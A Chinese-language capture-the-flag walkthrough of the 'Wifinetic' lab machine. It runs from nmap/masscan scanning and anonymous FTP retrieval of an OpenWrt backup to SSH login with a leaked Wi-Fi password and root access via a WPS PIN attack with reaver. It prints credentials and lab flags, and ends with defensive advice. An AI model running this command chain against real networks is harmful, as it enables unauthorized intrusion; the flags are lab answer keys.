[Meachines] [Easy] Wifinetic FTP匿名登录+Reaver WPS PIN密码泄露权限提升
字数 1104 2025-08-29 08:30:36

Wifinetic 渗透测试教学文档:FTP匿名登录与Reaver WPS PIN漏洞利用

1. 信息收集阶段

1.1 目标识别

  • 目标IP地址:10.10.11.247
  • 扫描技术:使用nmap进行存活检测和端口扫描
  • 发现开放端口:
    • TCP 21 (FTP - vsftpd 3.0.3)
    • TCP 22 (SSH - OpenSSH 8.2p1 Ubuntu)
    • TCP 53 (tcpwrapped)

1.2 服务识别

nmap -Pn -sV -sC -p 21,22,53 10.10.11.247

2. FTP匿名登录利用

2.1 FTP服务分析

  • 服务版本:vsftpd 3.0.3
  • 允许匿名登录(FTP code 230)
  • 可用文件列表:
    • MigrateOpenWrt.txt (4,434字节)
    • ProjectGreatMigration.pdf (2,501,210字节)
    • ProjectOpenWRT.pdf (60,857字节)
    • backup-OpenWrt-2023-07-26.tar (40,960字节)
    • employees_wellness.pdf (52,946字节)

2.2 文件下载方法

# 方法1:使用ftp命令交互式下载
ftp 10.10.11.247
# 用户名输入anonymous,密码可为空或任意

# 方法2:使用wget批量下载
wget -r ftp://anonymous:anonymous@10.10.11.247

2.3 关键文件分析

  • 解压备份文件获取无线配置:
tar -xvf backup-OpenWrt-2023-07-26.tar
cat ./etc/config/wireless
  • 发现WiFi密码:VeRyUniUqWiFIPasswrd1!

3. 初始访问

3.1 SSH登录

使用发现的密码尝试SSH登录:

ssh netadmin@10.10.11.247
  • 成功获取用户权限
  • 用户flag:df32978a2541a4cb8a03ccc0fb8794ae

4. 权限提升

4.1 网络接口分析

ip a
iwconfig

发现以下接口:

  • wlan0: AP(接入点)模式,关联phy0
  • wlan1: 托管模式,支持P2P
  • phy2/wlan2/mon0:
    • wlan2: 托管模式
    • mon0: 监控模式

4.2 查找特殊权限文件

getcap -r / 2>/dev/null

发现:

  • /usr/bin/reaver具有root执行权限

4.3 Reaver工具利用

Reaver可利用WPS PIN漏洞获取WPA/WPA2密码

执行命令:

reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1
  • 获取root密码:WhatIsRealAnDWhAtIsNot51121!
  • root flag:3b787489a71d0e403687793940da1e1b

5. 漏洞总结与防御措施

5.1 发现漏洞

  1. FTP匿名登录漏洞
  2. 备份文件包含敏感信息(无线配置)
  3. Reaver工具配置不当(具有root权限)
  4. WPS PIN漏洞

5.2 防御建议

  1. 禁用FTP匿名登录
  2. 加密备份文件或限制访问权限
  3. 遵循最小权限原则,限制特殊权限
  4. 禁用WPS功能或使用强PIN码
  5. 定期更新系统和软件

6. 附录:完整命令序列

# 1. 扫描目标
ip='10.10.11.247'; itf='tun0'
nmap -Pn -sn "$ip"
sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf"
nmap -Pn -sV -sC -p 21,22,53 "$ip"

# 2. FTP匿名登录
ftp 10.10.11.247
# 或
wget -r ftp://anonymous:anonymous@10.10.11.247

# 3. 解压分析备份
tar -xvf backup-OpenWrt-2023-07-26.tar
cat ./etc/config/wireless

# 4. SSH登录
ssh netadmin@10.10.11.247

# 5. 权限提升
getcap -r / 2>/dev/null
reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1

通过以上步骤,我们完成了从信息收集到获取root权限的完整渗透测试过程。

Wifinetic 渗透测试教学文档:FTP匿名登录与Reaver WPS PIN漏洞利用 1. 信息收集阶段 1.1 目标识别 目标IP地址:10.10.11.247 扫描技术:使用nmap进行存活检测和端口扫描 发现开放端口: TCP 21 (FTP - vsftpd 3.0.3) TCP 22 (SSH - OpenSSH 8.2p1 Ubuntu) TCP 53 (tcpwrapped) 1.2 服务识别 2. FTP匿名登录利用 2.1 FTP服务分析 服务版本:vsftpd 3.0.3 允许匿名登录(FTP code 230) 可用文件列表: MigrateOpenWrt.txt (4,434字节) ProjectGreatMigration.pdf (2,501,210字节) ProjectOpenWRT.pdf (60,857字节) backup-OpenWrt-2023-07-26.tar (40,960字节) employees_ wellness.pdf (52,946字节) 2.2 文件下载方法 2.3 关键文件分析 解压备份文件获取无线配置: 发现WiFi密码: VeRyUniUqWiFIPasswrd1! 3. 初始访问 3.1 SSH登录 使用发现的密码尝试SSH登录: 成功获取用户权限 用户flag: df32978a2541a4cb8a03ccc0fb8794ae 4. 权限提升 4.1 网络接口分析 发现以下接口: wlan0: AP(接入点)模式,关联phy0 wlan1: 托管模式,支持P2P phy2/wlan2/mon0: wlan2: 托管模式 mon0: 监控模式 4.2 查找特殊权限文件 发现: /usr/bin/reaver 具有root执行权限 4.3 Reaver工具利用 Reaver可利用WPS PIN漏洞获取WPA/WPA2密码 执行命令: 获取root密码: WhatIsRealAnDWhAtIsNot51121! root flag: 3b787489a71d0e403687793940da1e1b 5. 漏洞总结与防御措施 5.1 发现漏洞 FTP匿名登录漏洞 备份文件包含敏感信息(无线配置) Reaver工具配置不当(具有root权限) WPS PIN漏洞 5.2 防御建议 禁用FTP匿名登录 加密备份文件或限制访问权限 遵循最小权限原则,限制特殊权限 禁用WPS功能或使用强PIN码 定期更新系统和软件 6. 附录:完整命令序列 通过以上步骤,我们完成了从信息收集到获取root权限的完整渗透测试过程。